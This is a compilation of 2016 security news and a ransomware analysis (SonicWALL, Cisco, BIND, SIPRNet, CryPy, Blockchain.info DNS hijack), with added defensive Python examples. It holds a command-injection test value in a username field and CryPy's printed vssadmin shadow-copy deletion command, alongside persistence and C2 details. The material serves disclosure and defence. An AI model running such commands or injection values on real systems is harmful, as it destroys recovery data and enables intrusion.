SonicWALL Email Security appliance flaws could expose corporate emails
14.10.2016 securityaffairs Vulnerability
Dell issued the SonicWALL Email Security OS 8.3.2 release to address high severity issues that can be exploited to take control of the appliance.
Security researchers at Digital Defense discovered multiple vulnerabilities while assessing the SonicWALL Email Security virtual appliance (version 8.3.0.6149). According to the experts, the flaws could be exploited by attackers to conduct a wide range of malicious activities, including command injection, arbitrary file deletion, denial of service (DoS) and information disclosure.
Below is the list of vulnerabilities discovered by the Digital Defense, Inc. Vulnerability Research Team (VRT).
DDI-VRT-2016-69: Authentication Bypass in DLoadReportsServlet (High)
The attacker can access backup files that include also the SHA-1 hash of the administrator account password.
“The DLoadReportsServlet can be accessed via the http://<IP>/dload_reports URL without authentication. If any backups have been made via the web interface and the Email Security appliance is set as the storage location, they can be downloaded by supplying the path to the backup via the “snapshot” GET parameter which can be used to access any files stored in the backup directory or one of its sub-directories. ” reads the analysis published by the experts.
DDI-VRT-2016-70: Authenticated XML External Entity Injection in known_network_data_import.html (High)
The experts discovered that it is possible to launch an XML External Entity (XXE) injection attack to steal sensitive data.
DDI-VRT-2016-71: Authenticated Remote Command Execution in manage_ftpprofile.html (High)
The issue resides in the feature used to send backup files to a remote FTP server.
“The SonicWALL Email Security appliance has an option to send backup files to a remote FTP server instead of storing them locally on the appliance. To use this functionality, the user would need to create an FTP profile which includes the FTP server address, port, username, password, and destination path. No sanitation is done on the user provided values for the username or password before they are saved for later use. Commands placed inside backticks or semicolons can be injected via the username or password parameters.” states the analysis published by Digital Defense.
DDI-VRT-2016-72: Authenticated Arbitrary File Deletion in policy_dictionary.html (High)
The flaw allows attackers to delete arbitrary files with root privileges and trigger DoS conditions.
The researchers discovered that a bug in the way compliance dictionaries are managed via web interface allows authenticated attackers to select any files and delete them.
“When a dictionary is selected for deletion the “save” method is called. This method first verifies that the dictionary selected for deletion is not in use before deleting the dictionary file from disk. The “save” method does not validate that the “selectedDictionary” POST parameter contains a valid dictionary before deleting the file. This allows an authenticated user to delete any files from the host that is running the SonicWALL Email Security software.” states the advisory.
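The FTP profile issue (DDI-VRT-2016-71) and the dictionary deletion issue (DDI-VRT-2016-72) are both missing-validation bugs. The following added example, which is not the appliance's code, shows the flawed string-splicing pattern beside a hardened handler for each: an allowlist on the username plus an argv list (so no shell ever parses the password), and a "known dictionary, inside the dictionary directory" check before a file is unlinked. The curl-based transfer, the `.dict` extension and the function names are assumptions made for the example.

```python
import re
from pathlib import Path

# Added illustration of the two input-validation failures described in the
# advisory. Hypothetical handlers, not the appliance's code.

USERNAME_RE = re.compile(r"^[A-Za-z0-9._@-]{1,64}$")


def build_ftp_command_unsafe(profile):
    """The flawed pattern: profile values are spliced into one shell string,
    so backticks or semicolons in username/password reach the shell."""
    return ("curl -T backup.tgz ftp://{username}:{password}@{host}:{port}{path}"
            .format(**profile))


def build_ftp_command_safe(profile):
    """Validate the profile, then build an argv list so no shell parses it."""
    if not USERNAME_RE.match(profile["username"]):
        raise ValueError("username contains characters outside the allowlist")
    port = int(profile["port"])
    if not 1 <= port <= 65535:
        raise ValueError("port out of range")
    # The password is handed to curl as its own argv element and never
    # interpolated into a command line, so shell metacharacters in it are inert.
    url = "ftp://{host}:{port}{path}".format(host=profile["host"], port=port,
                                             path=profile["path"])
    return ["curl", "-T", "backup.tgz", "--user",
            "{}:{}".format(profile["username"], profile["password"]), url]


def rejects(profile):
    """True if the hardened builder refuses the profile."""
    try:
        build_ftp_command_safe(profile)
        return False
    except ValueError:
        return True


def delete_dictionary_safe(dict_dir, selected):
    """Delete a compliance dictionary only if `selected` names an existing
    dictionary file directly inside dict_dir (no traversal, no other files)."""
    base = Path(dict_dir).resolve()
    known = {p.name for p in base.iterdir() if p.is_file() and p.suffix == ".dict"}
    if selected not in known:          # rejects "../x", absolute paths, other files
        raise ValueError("{!r} is not a known dictionary".format(selected))
    target = (base / selected).resolve()
    if target.parent != base:          # defence in depth against symlink tricks
        raise ValueError("resolved path escapes the dictionary directory")
    target.unlink()
    return target


# Constructed sample profiles (values invented for the example).
CLEAN_PROFILE = {"host": "backup.example.test", "port": "21", "username": "backup_svc",
                 "password": "p@ss;word", "path": "/es-backups/"}
INJECTED_PROFILE = dict(CLEAN_PROFILE, username="backup_svc;echo injected")


def demo_dictionary_deletion():
    """Exercise delete_dictionary_safe on a throwaway directory (constructed).
    Returns (real dictionary deleted, traversal rejected, other file untouched)."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp)
        d = base / "dictionaries"
        d.mkdir()
        (d / "hipaa.dict").write_text("ssn\n")
        (base / "important.conf").write_text("keep me\n")
        deleted = delete_dictionary_safe(d, "hipaa.dict")
        deleted_ok = not deleted.exists()
        traversal_rejected = False
        try:
            delete_dictionary_safe(d, "../important.conf")
        except ValueError:
            traversal_rejected = True
        untouched = (base / "important.conf").exists()
    return deleted_ok, traversal_rejected, untouched


if __name__ == "__main__":
    print(build_ftp_command_unsafe(INJECTED_PROFILE))   # metacharacters survive intact
    print(build_ftp_command_safe(CLEAN_PROFILE))
    print(demo_dictionary_deletion())
```

The unsafe builder is shown only so the contrast is visible; the point of the hardened version is that validation happens before the value is used, and that the command is built as an argument vector rather than a string.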
The researchers explained that a flawed SonicWALL Email Security virtual appliance may be configured for external access; in that case remote attackers can take complete control of it by chaining the authentication bypass and command execution flaws.
The full control over the SonicWALL Email Security virtual appliance could be exploited to capture inbound and outbound emails of the organization.
Dell has patched the issues with the new SonicWALL Email Security OS 8.3.2 release.
Cisco Meeting Server – CVE-2016-6445 flaw allows to impersonate legitimate users
14.10.2016 securityaffairs Vulnerability
Cisco fixed a critical vulnerability in the Cisco Meeting Server, tracked as CVE-2016-6445, that allows remote attackers to impersonate legitimate users.
A security vulnerability in Cisco Meeting Server, tracked as CVE-2016-6445, could be exploited by attackers to impersonate legitimate users.
Experts from Cisco uncovered the vulnerability during a routine security audit of a customer.
The hole resides in the Extensible Messaging and Presence Protocol (XMPP) service of the Cisco Meeting Server (CMS). According to Cisco, the XMPP service incorrectly processes a deprecated authentication scheme allowing an unauthenticated attacker to access the system impersonating another user.
“A vulnerability in the Extensible Messaging and Presence Protocol (XMPP) service of the Cisco Meeting Server (CMS) could allow an unauthenticated, remote attacker to masquerade as a legitimate user.” reads the security advisory published by CISCO. “This vulnerability is due to the XMPP service incorrectly processing a deprecated authentication scheme. A successful exploit could allow an attacker to access the system as another user.”
The CVE-2016-6445 flaw affects the following versions of the Cisco Meeting Server:
Cisco Meeting Server prior to 2.0.6 with XMPP enabled.
Acano Server prior to 1.8.18 and prior to 1.9.6 with XMPP enabled.
Cisco urges its customers to apply the appropriate updates; as a workaround it also suggests disabling the XMPP protocol with the “xmpp disable” command.
According to the company, there is no evidence that the CVE-2016-6445 has been exploited in the wild.
This is the second advisory published by Cisco for Meeting Server, a first one was published in July and it was related to a persistent cross-site scripting (XSS) flaw that allowed an unauthenticated attacker to execute arbitrary code in the context of the product’s management interface.
“A vulnerability in the web bridge that offers video via a web interface of Cisco Meeting Server Software, formerly Acano Conferencing Server, could allow an unauthenticated, remote attacker to conduct a persistent cross-site scripting (XSS) attack against a user of the web interface of an affected system.” stated the Cisco Advisory.
“The vulnerability is due to improper input validation of certain parameters that are passed to an affected device via an HTTP request. An attacker could exploit this vulnerability by persuading a user to follow a malicious link.”
Back to the CVE-2016-6445 flaw, the firmware updates can be downloaded from the CISCO Software Center (Products > Conferencing > Video Conferencing > Multiparty Conferencing > Meeting Server > Meeting Server 1000 > TelePresence Software).
Acano software can be downloaded from the Acano website.
Attackers are exploiting a recently patched high-severity DoS flaw in BIND
13.10.2016 securityaffairs Attack
Attackers are exploiting a recently patched high-severity DoS flaw, tracked as CVE-2016-2776, in the popular DNS software BIND.
Last month a vulnerability in the popular DNS software BIND, tracked as CVE-2016-2776, has been patched. The flaw could be exploited by a remote attacker to trigger a DoS condition using specially crafted DNS packets. The high severity flaw initially discovered by the Internet Systems Consortium (ISC) was fixed with the release of BIND 9.9.9-P3, 9.10.4-P3 and 9.11.0rc3.
“Testing by ISC has uncovered a critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria.” reported the alert issued by the ISC.
“This assertion can be triggered even if the apparent source address isn’t allowed to make queries (i.e. doesn’t match ‘allow-query’).”
The flaw resides in the way the DNS server constructs a response to certain queries: when the response is larger than the default 512 bytes, the BIND name server process (named) crashes, causing the DoS condition.
According to the Internet Systems Consortium (ISC), after the public disclosure of the proof-of-concept (PoC) code and a Metasploit module by the Infobyte firm, threat actors in the wild exploited it to cause server crashes.
The news was confirmed by the Japan’s National Police Agency that issued a security alert titled “BIND Vulnerability (CVE-2016-2776) for the observation of indiscriminate attack activities” to warn users of ongoing attacks.
“Designated as CVE-2016-2776, this particular vulnerability can be triggered when a DNS server constructs a response to a crafted query where the response size crosses the default DNS response size 512. ISC has fixed two vulnerable functions dns_message_renderbegin () and dns_message_rendersection() to address this vulnerability.” states the analysis published by TrendMicro.
“Before patching, the server does not take fixed 12-byte DNS headers into consideration, which also adds to the response traffic after rendering the Resource Records from Query through function dns_message_rendersection(). So if the DNS response(r.length) traffic is less than 512 bytes (msg->reserved), the function will return true, but adding the fixed 12-byte header will cause the service to terminate if it exceeds the fixed reserved size of 512 bytes.”
Experts at Infobyte believe that the use of the msg->reserved variable could introduce other vulnerabilities like the CVE-2016-2776.
“Publishing a fix about a lethal bug where you would have to patch the whole internet, doesn’t leave a lot of time to find elegant solutions. So if you review the fix it’s possible that a new similar bug appears in dns_message_renderbegin(), while the use of msg->reserved is quite limited. It continues being a complex software. Meanwhile msg->reserved is still being used, the existence of a bug like CVE-2016-2776 is quite probable.” states the blog post from InfoByte.
Classified U.S. Defense Network Outage Hits Air Force’s Secret Drone Operations
13.10.2016 thehackernews Safety
U.S. drones are again in news for killing innocent people.
The Air Force is investigating the connection between the failure of its classified network, dubbed SIPRNet, at Creech Air Force Base and a series of high-profile airstrikes that went terribly wrong in September this year.
Creech Air Force Base is a secret facility outside Las Vegas, where military and Air Force pilots sitting in dark and air-conditioned rooms, 7100 miles from Syria and Afghanistan, remotely control their "targeted killing" drone campaign in a video-game-style warfare.
From this ground zero, Air Force pilots fire missiles at targeted areas half a world away just by triggering a joystick, and also operate drones for surveillance and intelligence gathering.
Drone operation facility at Creech Air Force Base -- a key base for worldwide drone and targeted killing operations -- has been assigned as ‘Special Access Programs’, to access SIPRnet.
What is SIPRnet?
SIPRNet, or Secret Internet Protocol Router Network, is a global United States military Internet system used for transmitting classified information, intelligence, targets, and messages at the secret level.
In other words, SIPRNet is a completely parallel Internet: it uses the same communications procedures but is kept separate from the ordinary civilian Internet.
Approximately 3 Million people with secret clearances have access to SIPRNet, which includes Pentagon and military officials, Intelligence agencies, FBI, as well as diplomats in US embassies all around the World.
Classified Network Crashed at Creech Base
The network at Creech Air Force Base crashed in early September, impacting "critical services," and has not been completely rebuilt, according to US government contracting records.
"On 9 September 2016, the SIPRNet system currently in operation at Creech AFB failed, and critical services were impacted," reads a contracting notice posted by the US government in early October.
"The services were somewhat restored with the use of multiple less powerful devices. This temporary solution stabilized the services, but will not be able to maintain the demand for very long. If this solution fails, there is currently no other backup system."
The officials would not say whether the failure was due to internal technical faults, a cyber attack, or a state-sponsored hacker. They would also not say if JWICS — a separate internet system that handles top-secret information — at Creech was also affected.
US Drones Killed around 100 Innocents within Two Weeks
Within weeks of the computer disaster, a series of airstrikes went terribly wrong, which resulted in scores of deaths in Syria, Afghanistan, and Somalia, according to BuzzFeed News.
On September 17, 62 Syrian soldiers were accidentally killed by US airstrikes in the middle of a ceasefire. On September 28, 15 innocent civilians were reportedly killed in Afghanistan by a US drone, as well as 22 Somali soldiers were reportedly killed in Somalia by US drone strikes.
All the cases are under review and investigation, and there has been no official explanation for targeting innocent people, though the United States expressed its regrets quickly after the incident, according to reports.
On October 7, the Air Force quietly announced that Creech base would be subject to a surprise cyber security inspection and warned personnel to be wary of phishing attacks and to be extra careful in securing their login credentials.
Has U.S. Classified Network Been Hacked?
These classified networks are definitely not connected to the Internet, but this does not mean that malware or well-resourced hackers can never find their way into these critical networks.
If confirmed, this would not be the first time, when a classified computer network of US military has been compromised.
In the year 2008, The Pentagon acknowledged a significant cyber attack, Operation Buckshot Yankee, where a foreign intelligence agent used a USB drive to infect military computers used by the Central Command in overseeing combat zones in Iraq and Afghanistan with a specially crafted malware.
You might be aware of Chelsea Manning (then known as Bradley Manning), an army soldier who made headlines in 2013 when she was sentenced to 35 years in prison for leaking over 700,000 classified files to WikiLeaks.
Manning allegedly downloaded those secret documents from SIPRNet using a Lady Gaga CD.
Since these classified networks have a significant role in US national security, terrorist groups and state-sponsored hackers belonging to sophisticated nation-states like China, Russia, Iran, and North Korea have always shown large interest in targeting them.
CryPy: ransomware behind Israeli lines
13.10.2016 Kaspersky Virus
A Tweet posted recently by AVG researcher, Jakub Kroustek, suggested that a new ransomware, written entirely in Python, had been found in the wild, joining the emerging trend for Pysomwares such as the latest HolyCrypt, Fs0ciety Locker and others.
This Python executable comprises two main files. One is called boot_common.py and the other encryptor.py. The first is responsible for error-logging on Windows platforms, while the second, the encryptor, is the actual locker. Within the encryptor are a number of functions including two calls to the C&C server. The C&C is hidden behind a compromised web server located in Israel. The Israeli server was compromised using a known vulnerability in a content management system called Magento, which allowed the threat actors to upload a PHP shell script as well as additional files that assist them in streaming data from the ransomware to the C&C and back.
A notable point to mention is that the server was also used for phishing attacks, and contained Paypal phishing pages. There are strong indications that a Hebrew-speaking threat actor was behind these phishing attacks. The stolen Paypal credentials were forwarded to another remote server located in Mexico and which contains the same arbitrary file upload technique, only with a different content management.
It is a known practice for attackers to look for low-hanging fruit into which they can inject their code in order to hide their C&C server. One such example was the CTB-Locker for web servers reported last March.
Ransomware Analysis
ICON:
SHA1: ad046bfa111a493619ca404909ef82cb0107f012
MD5: 8bd7cd1eee4594ad4886ac3f1a05273b
Size: 5.22 MB
Type: exe
To reverse the executable one should first conduct a number of checks using a convenient debugger. The universal steps for unpacking an unknown packer start with trying to set a memory breakpoint on popular functions that packers use, such as VirtualAlloc.
If the breakpoint hits, the next step involves switching to user mode and setting a hardware breakpoint (on access). That will assist in inspecting where exactly the program initializes the memory block. In most cases, an executable magic header (MZ) should appear in the memory block. However, in this case the following screenshot shows the readable data that was allocated to that memory block:
After the data was allocated to the memory block, it appeared to be using VM code (python vm) to execute the code. For those who are not familiar with the term, VM code is the process of creating new instruction sets based on the author’s request. The CPU uses those instruction sets to understand the instructions.
py2exe simply converts the code to x86 assembly, the architecture the CPU executes, and, by loading the Python DLL, loads all the modules into memory.
We found that the executable file was generated using py2exe. The first indicator was a stack PUSH instruction to add the string – PY2EXE_VERBOSE: a module that compiles Python scripts to Microsoft Windows executables.
PY2EXE module string disclosure
A module that reverses the py2exe operation can be found on GitHub and is called unpy2exe. This module reverts the executable back to its original compiled Python code (i.e. a .pyc file). From that format, another step is required to fully revert to the original source code; we chose EasyPythonDecompiler for this.
Fully decompiled Python scripts
In its current state, the executable fails to encrypt the file system, simply because the threat actors must have migrated from the current server to another. By doing so, they deleted the remaining traces of the PHP files they used for data collection from a victim’s machine. The following is the log file that is generated upon exception:
Error log file being generated by the boot_common.py
The Python payload consists of two files:
Name: boot_common.py
md5: dfd6237e26babdbc2b32fa0d625c2d16
SHA1: 38fe7b64113e467375202e2708199b45a22b25a6
Size: 3Kb
This file throws an “error” to show that the program failed to execute if there is a problem.
Name: encryptor.py
md5: 1ed3f127a0e94394ef049965bbc952ef
SHA1: 73122712b4563fadcc9871eb3fe0efdcf70bb608
Size: 9Kb
This script encrypts the victim’s files.
The ransomware disables the following features on the compromised machine:
By overwriting the registry policies it disables Registry Tools, Task Manager, CMD and Run.
list of registry manipulations
It then continues with changing bcdedit to disable recovery and ignore boot status policy.
The ransomware encrypts files with the following extensions:
*.mid, *.wma, *.flv, *.mkv, *.mov, *.avi, *.asf, *.mpeg, *.vob, *.mpg, *.wmv, *.fla, *.swf, *.wav, *.qcow2, *.vdi, *.vmdk, *.vmx, *.gpg, *.aes, *.ARC, *.PAQ, *.tar.bz2, *.tbk, *.bak, *.tar, *.tgz, *.rar, *.zip, *.djv, *.djvu, *.svg, *.bmp, *.png, *.gif, *.raw, *.cgm, *.jpeg, *.jpg, *.tif, *.tiff, *.NEF, *.psd, *.cmd, *.class, *.jar, *.java, *.asp, *.brd, *.sch, *.dch, *.dip, *.vbs, *.asm, *.pas, *.cpp, *.php, *.ldf, *.mdf, *.ibd, *.MYI, *.MYD, *.frm, *.odb, *.dbf, *.mdb, *.sql, *.SQLITEDB, *.SQLITE3, *.asc, *.lay6, *.lay, *.ms11 (Security copy), *.sldm, *.sldx, *.ppsm, *.ppsx, *.ppam, *.docb, *.mml, *.sxm, *.otg, *.odg, *.uop, *.potx, *.potm, *.pptx, *.pptm, *.std, *.sxd, *.pot, *.pps, *.sti, *.sxi, *.otp, *.odp, *.wks, *.xltx, *.xltm, *.xlsx, *.xlsm, *.xlsb, *.slk, *.xlw, *.xlt, *.xlm, *.xlc, *.dif, *.stc, *.sxc, *.ots, *.ods, *.hwp, *.dotm, *.dotx, *.docm, *.docx, *.DOT, *.max, *.xml, *.txt, *.CSV, *.uot, *.RTF, *.pdf, *.XLS, *.PPT, *.stw, *.sxw, *.ott, *.odt, *.DOC, *.pem, *.csr, *.crt, *.key and wallet.dat to encrypt crypto currency wallets
The files are encrypted using AES with CBC mode for the following paths:
D:\\
E:\\
[userhome]\\contacts
[userhome]\\Documents\\
[userhome]\\Downloads\\
[userhome]\\Favorites\\
[userhome]\\Links\\
[userhome]\\My Documents\\
[userhome]\\My Music\\
[userhome]\\My Pictures\\
[userhome]\\My Videos\\
F:\\
.
.
Z:\\
*userhome - The current user home directory
When the encryption step is done, the ransomware removes the restore points, writes the README_FOR_DECRYPT.txt file and executes it. The following screenshot is the ransom note:
CryPy Ransomware Note embedded in the Python code
The threat actor behind the attack asks the victim to contact it via email, and to send a request to the following two email addresses to receive the decryption program:
(1) m4n14k@sigaint[.]org
(2) blackone@sigaint[.]org
Note that the ransom note contains mistakes, implying that it was written by a non-English speaker. First, the headline is missing a ‘T’ in “IMPORTAN INFORMATION”. Second, the sentence “Decrypting of your files…” is syntactically wrong. Native speakers will be able to find additional mistakes.
The threat actor claims that files will be deleted every 6 hours, which mirrors the approach of more advanced ransomware. However, it does not mention proof of decryption or a channel that can be used in cases where the payment process is not responsive. This points to the executable being at an early stage of development.
The ransomware survives a reboot by adding the following keys to the registry:
Software\\Microsoft\\Windows\\CurrentVersion\\Run
regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run
subkey Adobe_ReaderX
data %TEMP%\\mw.exe
regkey Software\\Microsoft\\Windows\\CurrentVersion\\Run
subkey explore_
data [userhome]\\Appdata\\local\\DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.exe
The code that adds the values to the registry is located in the functions autorun() and autorun2().
These keys cause the computer to execute the files after the computer is restarted.
Right before launching the ransom note, the script calls a delete_shadow() function that takes no arguments, and simply executes the following command line code to remove all shadow copies and prevent recovery from backup:
os.system("vssadmin Delete shadows /all /Quiet")
Lastly, the file calls the autorun2() function, which copies the ransomware from its current location to C:\\Users\\\\AppData\\Local with the hardcoded name:
DCBC2A71-70D8-4DAN-EHR8-E0D61DEA3FDF.exe
C2 Communication
The ransomware hides behind an Israeli web server that was compromised through an arbitrary file upload of a PHP shell script. The compromise and upload were possible because the server ran a vulnerable Magento CMS.
The executable transfers data over an unencrypted HTTP channel in clear-text. This allows for easy traffic inspection using a network listener. The following screenshot is the traffic being sent to the server:
Inspecting the Magento exploit and the compromised server, we found that the origin of the upload carries the title Pak Haxor – Auto Xploiter and the email ardiansyah09996@gmail[.]com and that the file was uploaded in August 2016, which aligns with the case in subject. The following screenshot reveals how attackers are using massive exploiters that scan for vulnerable web servers and exploit the vulnerability, which they later visit to expand their control over the server:
Part of such an exploitation technique is dropping additional PHP scripts to refine a more sophisticated attack, such as the CryPy ransomware.
One such script can be found hard-coded in the CryPy Python code, in the form of a GET request. The request is sent with two parameters to a script that was uploaded using the Auto Xploiter and carries the name victim.php. Reviewing the Python code makes it easier to understand the type of data being sent in Base64-encoded form.
As seen in the screenshot above, the configurl parameter holds a URL querystring in which the victim_info value of the info parameter is derived from the platform module.
uname() is used to return a tuple of system, node, release, version, machine and processor values. These are encoded with Base64.
The next parameter is ip, which contains the result of socket.gethostname(), used here to identify the host.
The querystring is then sent to urllib.urlopen(), which issues a GET request to the selected server and reads the response content into glob_config.
The response contains a JSON format payload which is checked for the following keys:
x_ID – the victim’s unique ID to request their decryption keys after payment.
x_UDP – Not used; perhaps saved for future use.
x_PDP – Not used; perhaps saved for future use.
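The check-in described above and the savekey.php call that follows leave a distinctive trace in the compromised web server's access log: requests to the two IoC paths whose parameters are Base64 strings. The following added example (not Kaspersky's code or the malware's) parses constructed Apache combined-format log lines, picks out requests to those two scripts and decodes their parameters so an analyst can see what the victim host disclosed. The parameter names `file` and `id` for savekey.php, the uname tuple contents, the percent-encoding of the Base64 values and the `Python-urllib/1.17` user agent are assumptions; the report only states that `info` carries the Base64-encoded platform.uname() output and `ip` the hostname.

```python
import base64
import re
from urllib.parse import parse_qs, quote, urlsplit

# Request paths named in the report's IoC list, mapped to the role the
# report attributes to each script.
BEACON_PATHS = {
    "/js/owebia/victim.php": "check-in (host info, victim ID request)",
    "/js/owebia/savekey.php": "per-file key request",
}

# Apache combined log format: src ident user [time] "METHOD target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$'
)


def _b64_param(value):
    """Base64 then percent-encode a value (assumed wire encoding, used only to
    build the constructed sample below)."""
    return quote(base64.b64encode(value.encode()).decode(), safe="")


# Constructed access-log excerpt. Addresses are documentation ranges; the
# uname tuple and filenames are invented.
UNAME = "('Windows', 'WS-042', '7', '6.1.7601', 'AMD64', 'Intel64 Family 6 Model 60')"
SAMPLE_LOG = [
    ('203.0.113.7 - - [10/Oct/2016:09:14:02 +0300] "GET /js/owebia/victim.php?info={}&ip={} '
     'HTTP/1.1" 200 73 "-" "Python-urllib/1.17"').format(_b64_param(UNAME), _b64_param("WS-042")),
    '198.51.100.9 - - [10/Oct/2016:09:14:05 +0300] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    ('203.0.113.7 - - [10/Oct/2016:09:15:40 +0300] "GET /js/owebia/savekey.php?file={}&id={} '
     'HTTP/1.1" 200 40 "-" "Python-urllib/1.17"').format(_b64_param("budget.xlsx"), _b64_param("7fa1c2")),
]


def _decode_b64(value):
    """Decode a Base64 parameter; None if it is not valid Base64."""
    try:
        return base64.b64decode(value, validate=True).decode("utf-8", "replace")
    except ValueError:          # binascii.Error is a ValueError subclass
        return None


def find_beacons(lines):
    """Return one dict per request to a known CryPy C2 script, with its
    Base64 parameters decoded so the analyst can see what left the host."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        role = BEACON_PATHS.get(url.path)
        if role is None:
            continue
        params = {k: v[0] for k, v in parse_qs(url.query).items()}
        hits.append({
            "src": m["src"], "time": m["ts"], "role": role, "user_agent": m["ua"],
            "params": {k: _decode_b64(v) for k, v in params.items()},
        })
    return hits


if __name__ == "__main__":
    for hit in find_beacons(SAMPLE_LOG):
        print(hit["time"], hit["src"], hit["role"])
        for name, value in hit["params"].items():
            print("   ", name, "=", value)
```

Run against a real log, the same two paths can be matched by any log-search tool; the decoder is what turns the opaque parameter values into a list of disclosed host details and per-file key requests, which also gives a count of files for which keys were fetched before the C2 went away.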
The second call is implemented in a function called generate_file() which is responsible for fetching a unique key for each file before encryption.
We have seen in recent lockers that, in order to demonstrate trust and integrity, the victim is able to decrypt one or two files before making the payment. This proves the validity of the decryptor. In order to randomly choose a file, the attacker must first generate a unique token for each one. The second PHP script found in the code is savekey.php, which is described in the following screenshot and is suspected to have the C2 IP in it. It was however deleted long before we were able to reach it.
Like the first call, the second sends two parameters. The first is the file’s name and the other is the victim ID. In return, the server responds with two keys:
X – Unique key after encryption which will be appended to the file’s header.
Y – New filename which will be stored instead of the previous one.
These parameters are then sent to an encryption routine, along with the file’s original name.
IOCs
REG Keys
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer
HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\explore_
HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Adobe_ReaderX
Domains
hxxp://www.baraherbs[.]co.il/js/owebia/victim.php
hxxp://www.baraherbs[.]co.il/js/owebia/savekey.php
Hashes
8bd7cd1eee4594ad4886ac3f1a05273b crypy.exe
1ed3f127a0e94394ef049965bbc952ef encryptor.py
Emails
m4n14k@sigaint[.]com
blackone@sigaint[.]com
Bitcoin Wallet Blockchain.info went down due to a DNS Hijacking
13.10.2016 securityaffairs Hacking
Blockchain.info, the world’s most popular Bitcoin wallet and Block Explorer service went down this week due to a DNS Hijacking attack.
Crypto-currencies continue to be a privileged target of cyber criminals; Bitcoin wallets and services provided by the many companies operating in the industry have been targeted by criminal organizations as never before.
Blockchain.info, the world’s most popular Bitcoin wallet and Block Explorer service, suffered a mysterious outage this week and experts speculated that a cyber attack has disrupted the platform.
“Looks like our site is down. We’re working on it and should be back up soon.” reads the message displayed to the visitors during the downtime.
BlockChain informed its users about a possible DNS issue via Twitter.
Blockchain ✔ @blockchain
We're researching a DNS issue and looking into it. We apologize for the inconvenience. Stay tuned.
12:26 - 12 Oct 2016
“We’re making progress resolving the issue, but it may take upwards of several hours until services are fully restored,” states a second Tweet from the company while users were not able to access their online accounts.
At the same time, someone on Reddit reported the changes in the DNS records.
It looks like blockchain.info has just had their domain name hijacked. The whois and DNS records suddenly jumped from CloudFlare to a cheap web host. From the cache, the names used to be
Name Server: BETH.NS.CLOUDFLARE.COM
Name Server: JAY.NS.CLOUDFLARE.COM
and were then changed to
Name Server: DED88057-1.HOSTWINDSDNS.COM
Name Server: DED88057-2.HOSTWINDSDNS.COM
when queried these are returning
;; ANSWER SECTION:
blockchain.info. 11360 IN A 192.236.200.26
or
;; ANSWER SECTION:
blockchain.info. 14400 IN A 198.44.48.226″
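A change of this kind, an entire delegation jumping from one provider to another, is exactly what a small monitoring check can catch before users notice. The following added example (not part of the article or the Reddit post) parses dig-style answer sections like the one quoted above and compares the NS and A records against a baseline. The "before" nameservers and the post-hijack records are the ones quoted in the post; the pre-incident A record and the expected address range are placeholders, since the post does not give them.

```python
import re
from ipaddress import ip_address, ip_network

# Baseline delegation, from the Reddit post quoted above.
EXPECTED_NS = {"beth.ns.cloudflare.com", "jay.ns.cloudflare.com"}
# ASSUMED placeholder for the address range the site normally resolves into.
EXPECTED_A_NETS = [ip_network("203.0.113.0/24")]

# Constructed dig-style output for the two states described in the post.
# The pre-incident A record is an invented placeholder.
BEFORE = """\
;; ANSWER SECTION:
blockchain.info.  300  IN  NS  BETH.NS.CLOUDFLARE.COM.
blockchain.info.  300  IN  NS  JAY.NS.CLOUDFLARE.COM.
blockchain.info.  300  IN  A   203.0.113.10
"""
AFTER = """\
;; ANSWER SECTION:
blockchain.info.  11360  IN  NS  ded88057-1.hostwindsdns.com.
blockchain.info.  11360  IN  NS  ded88057-2.hostwindsdns.com.
blockchain.info.  11360  IN  A   192.236.200.26
"""

# One resource record line: name ttl IN type data
RR_RE = re.compile(r"^(?P<name>\S+)\s+(?P<ttl>\d+)\s+IN\s+(?P<type>[A-Z]+)\s+(?P<data>\S+)$")


def parse_answer(text):
    """Return (owner, type, data) tuples, ignoring ';;' comment lines.
    Names are lower-cased and stripped of the trailing dot so they compare cleanly."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_RE.match(line)
        if m:
            records.append((m["name"].rstrip(".").lower(), m["type"],
                            m["data"].rstrip(".").lower()))
    return records


def check_delegation(text, expected_ns=EXPECTED_NS, expected_a_nets=EXPECTED_A_NETS):
    """Return a list of findings; an empty list means the answer matches the baseline."""
    records = parse_answer(text)
    ns = {data for _, rtype, data in records if rtype == "NS"}
    a_records = {data for _, rtype, data in records if rtype == "A"}
    findings = []
    if not ns:
        findings.append("no NS records in answer")
    unexpected = ns - set(expected_ns)
    if unexpected:
        findings.append("unexpected nameservers: " + ", ".join(sorted(unexpected)))
    for addr in sorted(a_records):
        if not any(ip_address(addr) in net for net in expected_a_nets):
            findings.append("A record {} outside expected ranges".format(addr))
    return findings


if __name__ == "__main__":
    print("before:", check_delegation(BEFORE) or "ok")
    print("after: ", check_delegation(AFTER))
```

In practice the text fed to parse_answer would come from a scheduled `dig` of the zone's NS and A records; the value of the check lies in comparing against a stored baseline rather than just the previous run, so a change that persists across several polls is still reported.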
What happened?
The DNS server records for blockchain.info and blockchain.com were hijacked. Usually, this practice allows crooks to conduct phishing attacks in order to steal bitcoin wallet credentials.
Experts from OpenDNS detected the change in nameservers early:
dnsstream @dnsstream
critical: blockchain(.)info now has completely new nameservers (ded91868-1(.)hostwindsdns(.)com,ded91868-2(.)hostwindsdns(.)com)
12:34 - 12 Oct 2016
Experts at OpenDNS investigated the IP changes:
OpenDNS blocked the above IPs to prevent its customers who use Bitcoin from falling victim to the scammers.
Fortunately, nothing happened to Blockchain users, but DNS hijacking attacks are very dangerous because unaware users could be redirected to rogue websites that mimic the legitimate ones in an attempt to steal credentials.
